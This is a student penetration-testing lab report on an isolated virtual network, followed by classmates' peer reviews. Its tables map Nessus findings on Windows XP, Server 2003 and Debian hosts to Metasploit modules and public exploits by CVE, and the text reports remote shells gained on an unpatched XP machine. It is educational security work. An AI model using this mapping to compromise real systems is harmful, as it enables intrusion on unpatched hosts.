Abstract
The purpose of this exercise is to evaluate the concept of a security ‘exploit,’ both by application to a virtual testing environment, and by examination of public vulnerability databases. First, we propose a theoretical definition by which to classify an ‘exploit.’ Further, we evaluate the literature available with regard to this exercise and its application within the research being done. Then, we proceed to enumerate the vulnerabilities of the virtual hosts in our test environment, and associate these opportunities with exploit tools. Additionally, we test a subset of these exploit tools and evaluate their effectiveness within the domain of the virtual test machines. Finally, we research public vulnerability databases, and draw conclusions as to patterns present in these vulnerabilities against the theoretical OSI network stack model.
Introduction
In examining the multitude of possible modes available by which to compromise the test machines used for this procedure, it became obvious that some limits of the term ‘exploit’ should be qualified. First, we must state that an ‘exploit’ is not inherently separate from other concepts such as ‘active ‘ or ‘passive’ reconnaissance, but can be a complementary part of these categories. We suggest that the term ‘exploit’ simply is a response to the concept of ‘opportunity,’ and therefore use this to develop a definition within the scope of this exercise. We mandate that an ‘exploit’ must be defined by three necessary components: opportunity, employment, and gain.
The ‘opportunity’ of vulnerability is a pre-condition to the ’employment’ of an attack tool. Assuredly, this opportunity by itself is of little use if not acted upon; hence, only in the act of employment is an ‘exploit’ truly completed. Conversely, the ’employment’ of a tool without ‘opportunity’ is destined to fail: one cannot win a contest which does not exist. To clarify, consider the opportunity presented by a password ‘sniffed’ of the network: it in itself is not an exploit. The use of this password to penetrate a system is the employment of this information: it is a window of attack acted upon, and therefore has ‘exploited’ this opportunity. Similarly, the awareness of an open port with a vulnerable service is an ‘opportunity,’ and the use of a tool to compromise the host is the ’employment;’ the culmination of this exploit. Thus, we argue that both of these characteristics are necessary for an actual ‘exploit’ to occur: there exists a symbiotic property which cannot be violated.
The characteristic of ‘gain’ is almost always present by default, even if not in an obvious way. An attacker may ‘gain’ in crashing a server through use of a tool, even though the only thing ultimately accomplished is an increased sense of pride or self-satisfaction: hence even the most useless acts of vandalism have a component of ‘gain.’ We mention ‘gain’ only to be complete, but find it of little further use in categorizing security tools.
With this definition in mind, we face a number of important research areas. First, we explore the means and methods by which to ‘exploit’ our virtual test machines. Secondly, we attempt to utilize these means and methods in attack scenarios, and note whether any ‘exploit’ has occurred. Third, we analyze the collection of attack opportunities presented in public vulnerability databases with respect to the OSI construct.
Literature Review
This week’s reading is a mixture of articles concerning vulnerability testing. Red-Team Application Security Testing (Thompson, Chase, 2003) discusses security vulnerabilities that occur at the application level and methods for testing for these insecurities. Vendor System Vulnerability Testing Test Plan (Davidson, 2005) is a generic testing plan for testing SCADA systems at the Idaho National Laboratory. Network Penetration Testing (He, Bode, 2005) Further describes penetration testing; what it is, why it’s needed, and what tools can be used to conduct the tests.
Article: Red-Team Application Security Testing (Thompson, Chase, 2003)
This article begins with a description of the problems that create the need for network penetration testing. It describes the need to test like detectives instead of librarians. What it means by this is, conducting an investigation to find security flaws rather than relying on known security flaws. It proceeds to describe methods for finding buffer overflow vulnerabilities within applications. It recommends doing this by decomposing a large application into its various parts and then assessing them individually. Standard functional testing that occurs within the software development lifecycle does not extend into the arena of identifying security vulnerabilities within the application.
Functional testing is concerned with insuring that the software meets the requirements of the specification. Security testing needs to be done outside of development and functional testing. Once applications are decomposed into functional sections the sections of the application are ranked based on their potential for being insecure and assigned to individuals or teams to test. Testers are assigned to various roles, such as investigating components, executing tests, and acquiring tools. If the proper tools are not available, the specifications are passed to the development section to create them. The testers create problem reports that detail the vulnerability. Once the testing is completed the reports are analyzed to determine common vulnerabilities. These can be used to speed up future testing.
There are four main causes for security vulnerabilities; dependency failures, unanticipated user input, design vulnerabilities, and implementation vulnerabilities. Applications often rely on external resources. When these resources do not function properly, they can cause the application to be in an insecure state. This is what causes dependency failures. Unanticipated user input can cause buffer overflow when long strings are entered that are longer than the internal buffer designed to hold them. Design vulnerabilities refer to bugs that make it into the code that cause potential security holes within the application. Finally, implementation vulnerabilities are the vulnerabilities that occur when a secure specification is made insecure due to its implementation.
Article: Vendor System Vulnerability Testing Test Plan (Davidson, 2005)
This paper is a generic plan for an in depth vulnerability testing of SCADA/EMS systems at the Idaho National Laboratory. The Idaho National Laboratory provides a test bed for testing the controls of a power transmission grid. This sample report begins by describing the attacker profile, which is best described as white box testing – the testers have knowledge of the system prior to the testing process. Using a Gantt chart, it shows the project timeline for the stages of vulnerability testing. It goes on to describe the configuration of the baseline system, which is the default system without any security in place. In the next section they discuss the testing strategy. They specify that it will not include a review of the software source code to check for buffer overflow vulnerabilities and other possible insecurities.
They proceed with an outline of the test cases. The time for each test case is not listed in this document because it is negotiated as part of the overall testing activity. The first test case is a baseline validation, which is testing the as-delivered system prior to any modifications. This is done to get the worst case scenario vulnerabilities. Once the baseline testing is done, they test the following targets of evaluation; unauthorized access and escalation of privileges, operators work station, central database access, changing alarms and commands, changing state in the RTU, developers workstation, compromise the communication processor, data acquisition database access, and historian database access. For each of these targets of evaluation they document the allocated testing period, the test procedure, and the data requirements.
Next they discuss the methods by which they score the vulnerability of the system. Although a scoring system is not specified, they mention the Common Vulnerability Scoring System which was developed by the Department of Homeland Security’s National Infrastructure Advisory Council (NIAC).
They continue with the “rules of engagement”, which are the guidelines for how the tests are to be performed. These rules cover the safety and security of the system and its data. They conclude with a list of milestones and deliverables. The beginning and ending dates are left blank so that they can be filled in for the specific testing project.
Article: Network Penetration Testing (He, Bode, 2005)
This paper describes different types of penetration testing and tools that can be used in conducting penetration testing. Penetration testing is described as “breaking into networks to expose vulnerabilities”. Penetration testing is performed by ethical hackers – people who are hired by the organization to break into the system. Two ways that penetration testing can be classified is either as announced or unannounced. In unannounced testing, only upper management and the ethical hackers are aware that the test is taking place. Announced hacking occurs with the full knowledge and cooperation of the IT staff. Another way of classifying penetration testing is either black box or crystal box testing (also known as white box testing).
In black box testing, the ethical hackers do not have any knowledge of the internal workings of the network. They must spend considerable time obtaining this information to complete the penetration test. In crystal box or white box penetration testing, they are given information about the network prior to conducting the test. Regardless of the type of testing, they are to find as many vulnerabilities as possible within a given time period. The basic structure of the penetration is; prepare, analyze, document and clean up. The author lists several general vulnerabilities, and vulnerabilities that are specific to certain operating systems or applications. The author proceeds to list several tools that are commonly used in various aspects of penetration testing. One such tool is a product called CORE IMPACT, which automates the penetration testing process. Another is ProCheckNet, which uses an artificial intelligence approach.
The author then discusses the unique problems that occur with wireless networks. One such problem is that wireless networks lack the physical layer security that wired networks have. Unlike wired networks that require a physical connection, wireless networks only know the bounds of their own signals. Even WEP protected networks are easily breeched using tools such as AirSnort. AirSnort passively monitors packets until it has gathered enough packets to determine the WEP encryption key.
These articles apply to our labs in a few different ways. They serve to increase our vocabulary of penetration testing terminology and help us to better understand some of the terminology we have already learned. Testing procedures, methods and tools are discussed that can assist is when conducting our own penetration testing. We are also given a generic penetration testing plan that we can use as a basis for preparing our own penetration testing plan. They also reinforce some of the reasons that penetration testing is needed.
Methodology and Procedure
Various methods were entertained for developing a list of exploits for the test machines. Initially, the NESSUS plug-in listing was consulted with an eye to constructing a database by which to search for vulnerabilities by service name, but this proved untenable due to the way in which the NESSUS web interface operated, and the somewhat vague descriptions associated with the plug-ins themselves. It was then decided to attack the issue by using Common Vulnerability and Exposure (CVE) listing numbers to associated tools with vulnerabilities. This was chosen, as it was noticed that NESSUS listed the CVE where possible for vulnerabilities discovered on a scanned host.
To begin this search, the NESSUS program was installed on a copy of Windows XP Service Pack 3 within the VMware Workstation environment. All tests were performed via a Citrix connection to a remote desktop, and all hosts were of a virtual nature, as this provided the most flexibility and safety for this vulnerability scan. The Windows XP ‘tool host’ was brought online, along with four other machines: Debian Linux, Windows XP Service Pack 0, Windows Server 2003, and a separate Windows XP Service Pack 3 host, respectively. The Windows XP ‘tool host’ running NESSUS was configured with the static IP address of 192.168.3.100 to easily differentiate it from the hosts being scanned.
The four test hosts were scanned in the same operation, with ‘all’ plug-ins, including the ‘dangerous’ and ‘experimental’ plug-ins being enabled on the NESSUS control interface, along with the addition of ‘thorough’ and ‘SYN scanning’ options. The tests were performed, and the result saved as an HTML report, which was then mailed to and accessed via an ‘offsite’ mail account for ease of examination. Each host and its reported vulnerabilities were catalogued into a table, along with CVE numbers where available. The vulnerabilities were classified and sorted by OSI layer and McCumber cube classification, and the CVE numbers used to consult various sources, including the main CVE database, for known attack implementations. Results, when found, were entered into the tables. Some of the attack tools were tested, but others were not due to time constraints.
It should be noted that we followed our ‘opportunity’ and ’employment’ system of classification in the layout of the vulnerability table. As we judged the opportunity to be the information resulting from the NESSUS scan, we matched each NESSUS result with an ’employment’ tool. For instance, the vulnerability presented by MAC address visibility (a rather minor security threat) was matched with a means to exploit this information, e.g. Ettercap via an ARP table poisoning.
Results and Discussion
Exploit Discovery and Usage
The results of the virtual machine vulnerabilities are presented in tables one through four. It is remarkable that the only virtual host which exhibit serious security vulnerabilities was the Windows XP Service Pack 0 machine. All of the ‘Metasploit’ modules listed in the table were used against this host, and all succeeded. We first crashed the machine with each attack module; and in a second test, configured the ‘Metasploit’ framework to return a command shell to the attacking machine for each of the modules. An example of a successfully opened remote shell via the ‘killbill’ module is shown in figure 1. We did not run any of the source code based attack tools: time constraints forced us to use readily available ‘pre-made’ executables, although we do plan to test these source code tools after the substantial task of installing and configuring a compiler ,creating build scripts, and rectifying platform compatibility issues are completed on our virtual ‘tool host.’ Additionally, most of the source code based attack tools appeared to be largely ‘proof of concept’ type code listings (of dubious code quality and sparse documentation): they generally purport to do no more than crash the remote host. We believe these to ultimately be of little use in their current form, and are investigating the possibility of creating ‘Metasploit’ modules based on these specific vulnerabilities instead. We generally referred to prior testing of the other tools, such as ‘Wireshark’ and ‘Nbtscan,’ for verification in that we have found these to function reliably in previous exercises.
Vulnerability Database Evaluation
Vulnerability Databases chronicle various bugs and flaws in software, generally with the intent that they be used by information technology professionals to better defend their systems and for software providers to improve their products. However these same databases provide a convenient catalogue of possible exploits for attackers. Penetration testers should be aware of these databases in order to have a more robust knowledge base to draw attacks from. Several vendors offer this service as a subscription or as part of other packages, but the same information can be found in open sources for the price of a bit more legwork.
The researchers examined four open source vulnerability databases in order to assess the kinds of vulnerabilities reported and the level of expertise displayed within the information. The researchers made a general search of the databases going back a year, and randomly three entries for closer examination. The researchers then took the most recent one week time period to assess the relationship of the listed vulnerabilities to the grid given in earlier labs.
The Department of Homeland Security provides the United States Computer Emergency Readiness Team. (US-CERT) One of the tools US-CERT provides is the Vulnerability Notes Database, a collection of reported vulnerabilities. US-CERT attempts to rank severity of the vulnerabilities, keep information updated and to provides information on fixes or work-arounds. They provide links to additional information and the origin of the report whenever possible(Department of Homeland Security 2009). US-CERT lists three new vulnerabilities in last month, and seventy-nine in the last year. Roughly 94% were Layer seven vulnerabilities. Nearly 100% of the reported vulnerabilities fit in the technology processing category (Department of Homeland Security 2009).
Secunia is a Danish information security-consulting firm. They research and publish vulnerabilities discovered by their own employees as well as those reported externally. Secunia claims to verify each instance before it is published to their database, as well as verifying solutions. Secunia attempts to rate the severity of vulnerabilities and provides solutions whenever possible. The search tool for the database makes getting historical numbers difficult, but they appear to release 10 to 15 new vulnerability notices daily. Looking at a sample of one week’s time, Secunia shows the same patterns. The majority (97%) of the vulnerabilities were in layer seven, and again almost all fit within the technology processing category, with the remainder falling into the realm of technology transmission (Secunia 2009).
The National Institute of Standards and Technology (NIST) maintains the National Vulnerability Database (NVD) as part of its Computer Security Division. Its purpose is to facilitate automation of vulnerability management and security measurement and compliance. The database contains a vulnerability search engine, which focuses specifically on the software vulnerabilities and misconfigurations contained within. The database provides severity ratings based on attack vector, complexity of the exploit, necessity of authentication, and impact, which is based loosely on confidentiality, integrity and availability. The database entries list links to other sources for additional or original advisories and solutions. In the past year, the NVD listed 5970 possible vulnerabilities. Here again, it appears that the majority of attacks fall in layer 7 at 92.5% in the last week. However, while of the vulnerabilities were technology based, the vulnerabilities appear to be more evenly distributed between the other traits (National Institute of Standards and Technology 2009).
The Open Source Vulnerability Database (OSVDB) is provided by “the community” In order to provide “accurate, detailed, current, and unbiased technical information.” Tenable Network Security sponsors the database. OSVDB takes a Wikipedia style approach to alerts. Information is submitted and updated “by the people”. Most of the vulnerabilities listed reference other sites as originators. The database provides possible solutions as well as some information about type and vector of the attack. The database contains thousands of entries, with 100 listed over the last seven days. 94% of these were layer 7 exploits, which were evenly distributed like the NVD (Open Source Vulnerability Database 2009).
These databases are by no means the only ones that exist. However, they represent the open source information available that is non-vendor specific. Vendors will often list vulnerabilities in their own products after they have patched them or found a solution to the problem. Other databases are available with less reputable content, or with more obviously malicious intent.
Interestingly, all four of the databases above link reference other databases in some entries, sometimes to the point of being circular. All occasionally referenced the above-mentioned grey area web sites. Of the four, only the Open Source Vulnerability Database had no evident method of verification. While each of the sites had some method for providing solutions, NIST simply referenced the source. Secunia was the only one of the four that appeared to have internal sources for vulnerability discovery and verification of both the vulnerability and the solution. Not all of the databases included all of the same exploits, and those that recurred were generally only in two or three. Based on this, the researchers recommend that penetration testers and information security professionals in general review more than one source of information to stay current.
Problems and Issues
Foremost, some vulnerabilities reported by NESSUS appeared largely ‘theoretical’ in nature, as no known exploit code was found capable of utilizing these vulnerabilities. Additionally, in an initial NESSUS test, the Windows XP Service Pack 3 target proved unresponsive. This was addressed by turning off the firewall, after which meaningful, if somewhat artificial, data could be gathered about vulnerabilities from this machine. Finally, the Debian virtual host network devices were initially absent: this was remedied by trial and error in conjunction with the logon network configuration message and manual configuration via ‘ifconfig.’
Conclusions
In conclusion then, we have fulfilled our research tasks. We have developed a theoretical definition of a security ‘exploit,’ and have used it to construct a meaningful attack matrix via the information obtained from the NESSUS security tool. Furthermore, we have used this attack matrix to evaluate ‘exploit’ tools, and have demonstrated within realistic constraints that these tools can be quite effective: namely, by using the ‘Metasploit’ framework to invoke remote shells without credentials on a remote Windows XP Service Pack 0 virtual host. Additionally, we have evaluated existing literature, and applied it to the research methods. Continuing, we have examined publically available vulnerability databases, specifically: US-CERT, Secunia, NVD, and OSVDB. From this research, we have found the majority of vulnerabilities to lie in the OSI model upper layers, largely in layer seven; and to be overwhelmingly associated with the technology-processing subspace of the McCumber cube construct. Finally, we have ascertained that due to non-trivial questions encountered on database verification methods, more than one database must be examined in any meaningful search for vulnerabilities.
Charts, Tables, and Illustrations
Figure 1: Example of remote shell obtained via ‘killbill’ ‘Metasploit’ plugin.
Table 1: Microsoft Windows XP Service Pack 3 No firewall (192.168.3.1)
OSI Layer | Vulnerability Description (port number/ protocol if applicable) | CVE Number(s) if available | McCumber
Coordinate |
Exploit Tool |
2 | MAC identification | Technology, Transmission, Confidentiality | Ettercap | |
3 | ICMP timestamp available | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark |
3 | Ping response | Technology, Transmission, Confidentiality | Nmap | |
4 | TCP timestamps | Technology, Transmission, Confidentiality | Wireshark | |
5 | SMB login (445/tcp) | CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2005-3595 | Technology, Storage, Confidentiality | Nbtscan, net use, etc. |
5 | SMB Lanman (445/tcp) | Technology, Storage, Confidentiality | Ophcrack | |
5 | SMB NULL session (445/tcp) | CVE-2002-1117 | Technology, Storage, Confidentiality | Nbtscan, net use, etc. |
5 | NetBios name (137/udp) | Technology, Storage, Confidentiality | Nbtscan | |
5 | SMB server ( 139/tcp) | Technology, Storage, Confidentiality | Nbtscan | |
5 | DCE/RPC server running (135/tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
7 | NTP running (123/udp) | Technology, Processing, Confidentiality | ntpq/ntpdc |
Table 2: Debian Etch 2.6.24-etchnhalf.1-686 SMP (192.168.3.2)
OSI Layer | Vulnerability Description (port number/ protocol if applicable) | CVE Number(s)
if available |
McCumber
Coordinate |
Exploit Tool |
2 | MAC identification | Technology, Transmission, Confidentiality | Ettercap | |
3 | ICMP timestamp | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark |
3 | Ping response | Technology, Transmission, Confidentiality | Nmap |
Table 3: Microsoft Windows XP Service Pack 0 (192.168.3.3)
OSI Layer | Vulnerability Description (port number/ protocol if applicable) | CVE Number(s) if available | McCumber
Coordinate |
Exploit Tool |
2 | MAC identification | Technology, Transmission, Confidentiality | Ettercap | |
3 | ICMP timestamp available | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark |
3 | Ping response | Technology, Transmission, Confidentiality | Nmap | |
3 | VPN server (500/ udp) | Technology, Transmission, Confidentiality | ike-scan | |
4 | TCP timestamps | Technology, Transmission, Confidentiality | Wireshark | |
5 | SMB server ( 139/tcp) | Technology, Storage, Confidentiality | Nbtscan | |
5 | NetBios name (137/udp) | Technology, Storage, Confidentiality | Nbtscan | |
5 | DCE service enumeration (1025/ tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
5 | DCE service enumeration (135/tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
5 | RPC buffer overrun | CVE-2003-0352 | Technology, Processing, Integrity | Metasploit module ms03_026_dcom |
5 | SMB login (445/tcp) | CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2005-3595 | Technology, Storage, Confidentiality | Nbtscan, net use, etc. |
5 | SMB Lanman (445/tcp) | Technology, Storage, Confidentiality | Ophcrack | |
5 | SMB NULL session (445/tcp) | CVE-2002-1117 | Technology, Storage, Confidentiality | Nbtscan, net use, etc. |
5 | DCE/RPC server running (135/tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
5 | SMB packet overflow DoS | CVE-2002-0724 | Technology, Processing, Availability | smbnuke at (1) |
5 | NTLM packet exploit | CVE-2003-0818 | Technology, Processing, Confidentiality | Metasploit module ms04_007_killbill |
5 | LSASS service exploit | CVE-2003-0533 | Technology, Processing, Confidentiality | Metasploit module ms04_011_lsass |
5 | SMB NULL session/ named pipe exploit | CVE-2005-0051 | Technology, Processing, Confidentiality | Unknown |
5 | SMB implementation flaw exploit | CVE-2005-1206 | Technology, Processing, Confidentiality | Unknown |
5 | RPC interface exploit | CVE-2003-0715, CVE-2003-0528, CVE-2003-0605 | Technology, Processing, Confidentiality | MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) at (2) |
5 | Printer Spooler service exploit | CVE-2005-1984 | Technology, Processing, Availability | Unknown |
5 | SMB share enumeration | Technology, Storage, Confidentiality | Nbtscan | |
5 | SMB memory corruption | CVE-2008-4834, CVE-2008-4835, CVE-2008-4114 | Technology, Storage, Availability | Unknown |
5 | ‘Server’ service buffer overrun | CVE-2006-3439 | Technology, Storage, Confidentiality | Metasploit module ms06_040_netapi |
5 | ‘Server’ service heap overflow | CVE-2006-1314, CVE-2006-1315 | Technology, Storage, Confidentiality | MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035) at (3) |
5 | ‘Server’ service buffer overrun privilege escalation | CVE-2008-4250 | Technology, Storage, Confidentiality | Metasploit module ms08_067_netapi |
5 | DCE service enumeration (1027/ udp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
7 | MS Messenger exploit | CVE-2003-0717 | Technology, Processing, Availability | MS Windows Messenger Service Denial of Service Exploit (MS03-043) at (4) |
7 | NTP running (123/udp) | Technology, Processing, Confidentiality | ntpq/ntpdc | |
7 | UPnP TCP helper (5000/tcp) | CVE-2001-0876 | Technology, Processing, Integrity | MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) at (5) (probably) |
Table 4: Microsoft Server 2003: No firewall (192.168.3.4)
OSI Layer | Vulnerability Description (port number/ protocol if applicable) | CVE Number(s) if available | McCumber
Coordinate |
Exploit Tool |
2 | MAC identification | Technology, Transmission, Confidentiality | Ettercap | |
3 | ICMP timestamp available | CVE-1999-0524 | Technology, Transmission, Confidentiality | Wireshark |
3 | Ping response | Technology, Transmission, Confidentiality | Nmap | |
4 | TCP timestamps | Technology, Transmission, Confidentiality | Wireshark | |
5 | NetBios name (137/udp) | Technology, Storage, Confidentiality | Nbtscan | |
5 | SMB login (445/tcp) | CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2005-3595 | Technology, Storage, Confidentiality | Nbtscan, net use, etc. |
5 | SMB Lanman (445/tcp) | Technology, Storage, Confidentiality | Ophcrack | |
5 | SMB NULL session (445/tcp) | CVE-2002-1117 | Technology, Storage, Confidentiality | Nbtscan, net use, etc. |
5 | DCE/RPC server running (135/tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
5 | SMB server ( 139/tcp) | Technology, Storage, Confidentiality | Nbtscan | |
5 | DCE service enumeration (445/tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
5 | SMB Lanman pipe browse listing | Technology, Storage, Confidentiality | Windows API | |
5 | DCE service enumeration (1025/tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
5 | DCE/RPC service enumeration (135/tcp) | Technology, Processing, Confidentiality | Microsoft PortQry | |
7 | NTP running (123/udp) | Technology, Processing, Confidentiality | ntpq/ntpdc |
References
Davidson, J. R. (2005, January). Vendor System Vulnerability Testing. pp. 1-23.
Department of Homeland Security. (2009). “US-CERT Vulnerability Notes Database.” Retrieved 6.25/2009, 2009, from http://www.kb.cert.org/vuls
He, L., & Bode, N. (n.d.). Network Penetration Testing.
National Institute of Standards and Technology. (2009, 7/4/2009). “National Vulnerability Database.” Retrieved 7/4/2009, 2009, from http://nvd.nist.gov/
Open Source Vulnerability Database. (2009). “OSVDB.” Retrieved 7/4/2009, 2009, from http://osvdb.org
Secunia. (2009). “Secunia Vulnerability and Advisory Database.” Retrieved 6/25/2009, 2009, from http://secunia.com/advisories/search/?
Thompson, H. H., & Chase, S. G. (2003, November). Red-Team Application Security Testing. Dr. Dobbs Journal , pp. 18-25.
Team three presents as usual a well thought out well designed lab report for lab four. While their abstract lists the steps that will be completed as part of the lab, it is lacking in length as per the syllabus. The introduction to the lab defines a number of terms that will be covered in the lab and really helps the reader to understand what is going to be discussed in more detail. Their explanation really breaks down the scope of what will be discussed in the lab, almost to the point of over explanation. I team three’s literature review they present an introductory paragraph that I feel is an attempt to bring the articles together and relate them to the lab. This attempt is apparently flawed as the literature review itself lacks any type of cohesion and is nothing more than a list of the articles for this lab four, and APA style citations in the headings for each article only. This is the area where team three needs to improve. Their literature reviews lack cohesion and even in text citations. Please visit the Purdue Online Writing Lab (OWL) to gain a better understanding of how to conduct a proper literature review with proper in text citations. The methods section of team three’s lab report details the process they went through to complete the findings section. They list a problem with the NESSUS web interface which in my opinion should be in the issues section not the method section as it is in fact in issue with their strategy. In the findings section team three first explains that metasploit worked only with the Windows XP SP0 host, and didn’t really have any luck with the other hosts in the VM network. This should be quite obvious as Windows XP is the longest running version of Windows, and “hackers” have had plenty of time to generate good sound automated exploits for the RTM release of Windows XP. Team three then lists the National Vulnerability Database, US-CERT, Scunia, and OSVDB as their chosen researched vulnerability databases. These seem to be the vulnerability databases of choice for most of the lab four lab reports as these results are in line with team two and team five as well. I agree with team three’s issues that most of the vulnerabilities that were listed by NESSUS were largely non-exploitable as no exploit code could be found to actually perform the exploit. The conclusions presented by team three are sound and are logical based on the lab report that they presented. Team three’s first table is remarkably lacking on exploits for many of the lower layers of the Windows XP protocol stack; the debian list is even shorter still. This is either because Microsoft and the like have done an extremely good job in protecting their latest releases, or team three did the lab wrong. If the former is the case, I foresee an issue when it comes to lab seven. Finally the Windows server 2003 table is much like the Windows XP SP3 table. This confirms that the former is more likely true above. Team three has presented a well balanced lab for lab four.
This group’s abstract is put together very well. The group gives the purpose of the lab and then breaks the lab down and explains each part of it in a very informative and professional manner. Next the group gives an introduction to the lab. In the introduction the group gives a complete explanation of what an exploit is. They break the definition of the word exploit down into three components and define each of the components. I really like the way that the group did this. This definition helped in explaining what an exploit is and opens up a way to look at the word is in respect to the lab. In the last part of the lab the group again explains what will be done in this lab, but in a more simplistic way. The literature review starts off with giving a brief explanation of each of the readings given in the lab. Then the literature review goes into more detail on each of the readings separately. Each of the descriptions of the articles seems to be just rehashing what was said in the article. The group does not explain the research question, research methodology, and any errors or omissions. The group also does not tie each of the articles into each other and show how they are related. At the end of the literature review the group does show how the articles relate to the current lab. I believe that the group should have spent more time in explaining how the articles were put together and how they tie into each other and the lab itself, and not on simplifying what was said in the articles. In the methodology the group gives a very good explanation of how they put together the scan with Nessus and classified the results according to the OSI model and McCumber’s cube. They explained all the steps in this process very thoroughly. The methodology was missing a lot of other parts though. The group did not cover any stand-alone tools and how they tested them. Also the group did not cover any description of how they were going to research databases of vulnerabilities explained in the last part of the lab. The group seemed to just concentrate on one section of the first part of the lab. The group could have added what terms they were going to use in the search for sites that had a current database of vulnerabilities and the method of how they were going to test how much expertise the site had. In the results section of this group’s lab they start off describing what they discovered while creating the table of exploits. The group does a nice job in describing the process of how the tests were carried out and the results that they discovered after the test was done. They could have added some of this into the methodology section though. The next part of the results section was on the last part of the lab. This section started off with a very nice introduction to this part of the lab. They give a definition of what a vulnerability database is and how it can aid in penetration testing and at the same time aid in malicious use. The next part of this section gives the way that they went about finding the vulnerability databases and how they categorized them. This section should have gone up in the methodology section of this paper. The group goes on by describing each of the four sites they found and explaining how they fit into the OSI model and McCumber’s cube using samplings of the vulnerabilities found on that site. The group does a nice job in describing the pros and cons of each of the sites they researched. In the end of the results the group states that each site did not share very many similar vulnerabilities, so penetration testers need to be aware of this and need to use multiple sites to keep current. In the issues section the group had troubles with running some of the exploits on Nessus against the Windows XP SP3 virtual machine. They found out that the firewall was blocking this. Wouldn’t that tell them that, because the firewall was on and actively blocking the exploits, the virtual machine that was targeted was secure against those vulnerabilities and turning off the firewall was defeating the purpose of the test? Also if I remember correctly, the professor mentioned that we only had to test against one machine at the meeting we had. The group does do a nice job in the conclusion. They wrap up how they went about each section of the lab and give a brief description of the results. Then they explain what they learned in each part of the lab.
The discussion in the introduction regarding the term ‘exploit’ could use some literature to back it up. The discussion on the three components that make up an exploit according to your definition could have been tied back to previous lab assignments. The literature review was merely a listing of the articles that were assigned for reading and a summary of each. The summaries were well written and complete but didn’t add much value to the lab. Tying the concepts in to the lab exercises and the discussion in the introductory section into the literature review would make the content more relevant to the task at hand.
The methodology section had good details about the environment used to do the initial testing for part one of the lab exercises and even contained a good pun. Part two was handled very briefly though the example given at the end gave good insight into the procedures. It was nice to see the information from the introduction on the parts of an exploit brought back in to the process. The results section was well written and described the process of testing the exploit tools very frankly. Instead of glossing over why some tools weren’t used or didn’t work, the authors plainly state the information and move on.
The results of the vulnerability database research provide some interesting insights into alternative uses of these sources. By using them as a source of information in this lab, we see how they can be used for bad as much as for good. The discussion on how the databases were selected and articles were picked at random would’ve fit better into the sparse handling of this section in the methodologies. The percentages of layer 7 vulnerabilities given with supporting literature shows a good depth of research for this section. While the data was good, I think some of the core concepts of this section’s research were missed, particularly the expertise involved in finding and possibly exploiting the vulnerability data listed in the databases.
The issue with the Windows XP SP3 firewall could use some further discussion. If it’s on and you are unable to scan it, the vulnerabilities still exist within the system but is having the firewall turned on a sufficient mitigation strategy? Having the firewall turned on would’ve saved probably thousands of user’s PCs from the Sasser worm. Would it be better to test in the context of these lab exercises with it on or off?
The conclusion lacks cohesion between the various sections of the lab, instead, it states the main points and the fact that they were successful.
The proper tags were not submitted with the lab report, which is part of the directions for submission. Like many other teams, this team uses the word “we” a lot. I would like to see team or group instead of “we”. The verb tense in the abstract is grammatical incorrect, since this is the abstract it should be in the future tense. I found it interesting that the group called the OSI network stack model theoretical, what makes it theoretical? The group nicely tied in some of their previous findings in their introduction paragraphs. A lot of terms have been defined. I am assuming that these definitions are the group’s own words or definitions and not from some other source, since nothing is cited with them. If they are from another source or a summary from another source, please cite. The group’s last paragraph sounds like it belongs in the abstract or the methods section. The group’s literature review read and looked like a list instead of the cohesive format required. The citations for each article, not in APA 5 format, were placed after the section heading, which was the article title. If the following paragraphs are a summary or even text coming directly from the articles, the citations go after all of that, not before. While the literature review does summarize the articles, they do not answer all of the questions that are required for a literature review. A literature review is more than the summary of an article, but rather a critique of what was presented in the article. The group did talk about how the articles relate to the lab, but never state how the articles relate to each other.
It was nice to see that the group had various methods in mind for how to perform the laboratory experiment. The group explained why they chose the path they did, which is different from what the rest of the groups did. The group clearly stated what steps were taken to perform the lab experiment. I liked that the group went back to using the virtual Citrix environment instead of using their own machines, like they did for lab 3. Why is this group the only one that performed these attacks on multiple machines? Did the rest of the groups miss something that this group did not? I found it interesting the differences in the vulnerabilities from one operating system to the next. I would like to have seen more screenshots, preferably within the methods section. Most of the groups found the same repositories for the databases that contain lists of vulnerabilities. One item missing from the results section is the findings of the level of expertise for the exploit repositories. So part 2 is not fully answered. The group’s conclusion section is for the most part a rehash of the abstract. This is the discussion of their results, which I found great that this group is the only one that noticed the circularity found between the open-source exploit databases.
As always team 3 does an excellent job of writing their abstract in such a way as to let the reader know exactly how they are going to proceed with the lab. The introduction as always was very insightful. The literature review contains their discussion of sources and is organized by publication. The summaries were well written and but didn’t really tie the authors ideas into the lab exercise.
The methodology section was well written and had good details about the environment used to do the testing. The results section was well written and described the process of testing the exploit tools in much detail.
Their vulnerability database research section was interesting in that it explained how the sources were used. However, as with some of the other teams they spent a lot of effort describing the vulnerability database sources as opposed to detailing the levels of expertise needed to run the exploits listed on the vulnerability sites.
The number of vulnerabilities in layer 7 seems to fit with the findings of the other teams’ research.
In the abstract section of the laboratory report, team three gave a detailed overview of what was to be accomplished in the laboratory assignment.
In the introduction, team three gave a description of what an exploit was. The group state “First, we must state that an ‘exploit’ is not inherently separate from other concepts such as ‘active ‘or ‘passive’ reconnaissance, but can be a complementary part of these categories” They went on to say that the term ‘exploit’ simply is a response to the concept of ‘opportunity,’ and therefore use this to develop a definition within the scope of this exercise. The team also described traits of an exploit, in that it must have three necessary components: opportunity, employment, and gain.
In the literature review section of the laboratory report, team three gave through summaries of the articles that were reviewed and related the articles back to the laboratory assignment. Team three did not seem to find any errors or omissions in any of the articles.
